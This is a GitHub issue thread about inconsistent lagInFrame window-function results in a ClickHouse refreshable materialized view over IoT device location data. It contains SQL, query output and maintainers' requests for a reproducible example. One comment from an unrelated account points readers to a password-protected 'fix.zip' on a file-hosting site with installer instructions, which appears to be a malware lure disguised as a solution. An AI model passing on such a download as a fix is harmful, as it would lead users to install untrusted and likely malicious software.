### ISSUE TITLE
non consistent loginframe results over a window

### ISSUE THREAD

**Issue by nagababu9652** [ClickHouse/ClickHouse#68993]
### Company or project name

IOT Engine Analytics

### Question

Hi, I was working with refresh materialized views to get the lag values once it a daily bases, Mostly I was gettnig the correct results but for few devices i was not getting the lag instead i was getting the same column value as lag. 

CREATE MATERIALIZED VIEW viewtrackerlagdata1 REFRESH EVERY 1 DAY TO tbltrackerlagdata1  as select deviceid, uniqueid,   ignitionstatus, speed, tenantgroupname, devicetypename, parsername,     latitude,    longitude,  devicedatetime, insertdatetime, vehicleid, lagInFrame (ignitionstatus) over win as  lagignition, lagInFrame(latitude) over win as laglatitude, lagInFrame (longitude) over win as laglongitude, lagInFrame(speed) over win as lagspeed from tbltrackerdata WHERE recordstatus = 1 AND devicetypename != '' AND insertdatetime >= toDateTime(toStartOfDay(now() - interval 1 day)) AND insertdatetime < toDateTime(toStartOfDay(now())) AND devicedatetime < insertdatetime + INTERVAL 1 MINUTE  window win as (partition by deviceid order by devicedatetime ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING)

SELECT
    deviceid,
    devicedatetime,
    latitude,
    laglatitude
FROM tbltrackerlagdata1
WHERE (deviceid = '869738069969389') AND ((insertdatetime >= '2024-08-27 05:00:00') AND (insertdatetime <= '2024-08-27 05:30:00'))
ORDER BY devicedatetime ASC
LIMIT 1000

Query id: 75fe88c4-68b8-4e39-b24a-4ad856c1121a

    ┌─deviceid────────┬──────devicedatetime─┬──latitude─┬─laglatitude─┐
 1. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229443 │
 2. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 3. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 4. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 5. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 6. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 7. │ 869738069969389 │ 2024-08-27 01:47:21 │ 25.229456 │   25.229456 │
 8. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
 9. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
10. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
11. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
12. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
13. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
14. │ 869738069969389 │ 2024-08-27 01:48:31 │ 25.229378 │   25.229378 │
15. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
16. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
17. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
18. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
19. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
20. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
21. │ 869738069969389 │ 2024-08-27 01:48:32 │ 25.229357 │   25.229357 │
22. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
23. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
24. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
25. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
26. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
27. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │
28. │ 869738069969389 │ 2024-08-27 01:48:45 │ 25.229286 │   25.229286 │

Exptected results: 

SELECT
    deviceid,
    devicedatetime,
    latitude,
    laglatitude
FROM tbltrackerlagdata1
WHERE (deviceid = 'AT325') AND ((insertdatetime >= '2024-08-27 05:00:00') AND (insertdatetime <= '2024-08-27 06:30:00'))
ORDER BY devicedatetime ASC
LIMIT 1000

Query id: 76dab7f0-a2da-4320-99ce-3bfc7279e1a0

    ┌─deviceid─┬──────devicedatetime─┬─latitude─┬─laglatitude─┐
 1. │ AT325    │ 2024-08-27 05:00:23 │ 25.40242 │    25.40242 │
 2. │ AT325    │ 2024-08-27 05:01:53 │ 25.40242 │    25.40242 │
 3. │ AT325    │ 2024-08-27 05:03:23 │ 25.40242 │    25.40242 │
 4. │ AT325    │ 2024-08-27 05:04:54 │ 25.40243 │    25.40242 │
 5. │ AT325    │ 2024-08-27 05:06:24 │ 25.40243 │    25.40243 │
 6. │ AT325    │ 2024-08-27 05:07:54 │ 25.40243 │    25.40243 │
 7. │ AT325    │ 2024-08-27 05:09:24 │ 25.40243 │    25.40243 │
 8. │ AT325    │ 2024-08-27 05:10:55 │ 25.40243 │    25.40243 │
 9. │ AT325    │ 2024-08-27 05:12:25 │ 25.40243 │    25.40243 │
10. │ AT325    │ 2024-08-27 05:13:55 │ 25.40243 │    25.40243 │
11. │ AT325    │ 2024-08-27 05:15:25 │ 25.40243 │    25.40243 │
12. │ AT325    │ 2024-08-27 05:16:56 │ 25.40243 │    25.40243 │
13. │ AT325    │ 2024-08-27 05:18:26 │ 25.40243 │    25.40243 │
14. │ AT325    │ 2024-08-27 05:19:56 │ 25.40243 │    25.40243 │
15. │ AT325    │ 2024-08-27 05:21:26 │ 25.40243 │    25.40243 │
16. │ AT325    │ 2024-08-27 05:22:56 │ 25.40243 │    25.40243 │
17. │ AT325    │ 2024-08-27 05:24:26 │ 25.40243 │    25.40243 │
18. │ AT325    │ 2024-08-27 05:26:33 │ 25.40244 │    25.40243 │
19. │ AT325    │ 2024-08-27 05:28:04 │ 25.40244 │    25.40244 │
20. │ AT325    │ 2024-08-27 05:29:34 │ 25.40244 │    25.40244 │

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by den-crane** [comment]
1. You query `WHERE (deviceid = '869738069969389')` Why do you expect `AT325`?
2. Do you get correct result without MATERIALIZED VIEW ?
3. Provide `version`
4. Provide input data, structures of all tables (create table...)
5. use fiddle https://fiddle.clickhouse.com/641c9671-491d-481d-a0ab-68c717d6f6c2 to demonstrate the issue

**Comment by nagababu9652** [comment]
Hi @den-crane ,

Those were two different queries show casing the difference.
SELECT
deviceid,
devicedatetime,
latitude,
laglatitude
FROM tbltrackerlagdata1
WHERE (deviceid = '869738069969389') AND ((insertdatetime >= '2024-08-27 05:00:00') AND (insertdatetime <= '2024-08-27 05:30:00'))
ORDER BY devicedatetime ASC
LIMIT 1000


SELECT
deviceid,
devicedatetime,
latitude,
laglatitude
FROM tbltrackerlagdata1
WHERE (deviceid = 'AT325') AND ((insertdatetime >= '2024-08-27 05:00:00') AND (insertdatetime <= '2024-08-27 06:30:00'))
ORDER BY devicedatetime ASC
LIMIT 1000

For the second query we can see that lag has been effected


  ┌─deviceid─┬─devicedatetime─┬──latitude─┬─laglatitude─┐
2 │ AT325 │ 2024-08-27 05:01:53 │ 25.40242 │ 25.40242 │
3 │ AT325 │ 2024-08-27 05:03:23 │ 25.40242 │ 25.40242 │
**4 │ AT325 │ 2024-08-27 05:04:54 │ 25.40243 │ 25.40242 │**

My base table is tbltrackerdata which was getting data from kafka. And creating tbltrackerlagdata from tbltrackerdata.



CREATE MATERIALIZED VIEW viewtrackerlagdata REFRESH EVERY 1 DAY TO tbltrackerlagdata as select deviceid, uniqueid, ignitionstatus, speed, tenantgroupname, devicetypename, parsername, latitude, longitude, devicedatetime, insertdatetime, vehicleid, lagInFrame (ignitionstatus) over win as lagignition, lagInFrame(latitude) over win as laglatitude, lagInFrame (longitude) over win as laglongitude, lagInFrame(speed) over win as lagspeed from tbltrackerdata WHERE recordstatus = 1 AND devicetypename != '' AND insertdatetime >= toDateTime(toStartOfDay(now() - interval 1 day)) AND insertdatetime < toDateTime(toStartOfDay(now())) AND devicedatetime < insertdatetime + INTERVAL 1 MINUTE window win as (partition by deviceid order by devicedatetime ROWS BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING)

**Comment by den-crane** [comment]
*    Do you get a correct result without MATERIALIZED VIEW ?
*   Provide version
*   Provide input data, structures of all tables (create table...)
*  use fiddle https://fiddle.clickhouse.com/641c9671-491d-481d-a0ab-68c717d6f6c2 to demonstrate the issue


@nagababu9652 https://fiddle.clickhouse.com/ !!!!

**Comment by Algunenano** [comment]
As Denny says, please provide some reproducible examples. With just queries and results and little comments it's impossible to understand what the problem is.
